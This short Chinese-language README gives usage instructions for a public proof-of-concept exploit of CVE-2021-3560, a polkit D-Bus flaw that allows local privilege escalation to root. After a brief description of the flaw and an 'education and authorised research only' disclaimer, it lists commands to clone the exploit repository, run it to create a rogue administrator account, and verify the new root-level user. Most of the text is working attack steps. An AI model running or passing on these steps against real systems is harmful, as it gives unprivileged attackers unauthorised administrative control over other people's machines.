⚠️ 仅用于教育和授权安全研究目的
非常感谢原始 PoC 作者 @UNICORDev,由 (@NicPWNs 和 @Dev-Yeoj) 编写
研究发现,polkit 可能被诱骗绕过 D-Bus 请求的凭据检查,从而将请求者的权限提升为 root 用户。非特权本地攻击者可以利用此漏洞,例如创建新的本地管理员。该漏洞对数据机密性、完整性以及系统可用性构成最高威胁。

安装 git,然后从 GitHub 仓库克隆脚本:
sudo apt install git python3 -y
git clone https://github.com/asepsaepdin/CVE-2021-3560.git
使用以下命令运行 PoC 脚本:
python3 exploit-CVE-2021-3560.py -u hacker -p password
注意:使用 -u 选项指定预期的用户名,使用 -p 选项指定预期的密码
使用以下命令验证创建的用户:
su hacker
id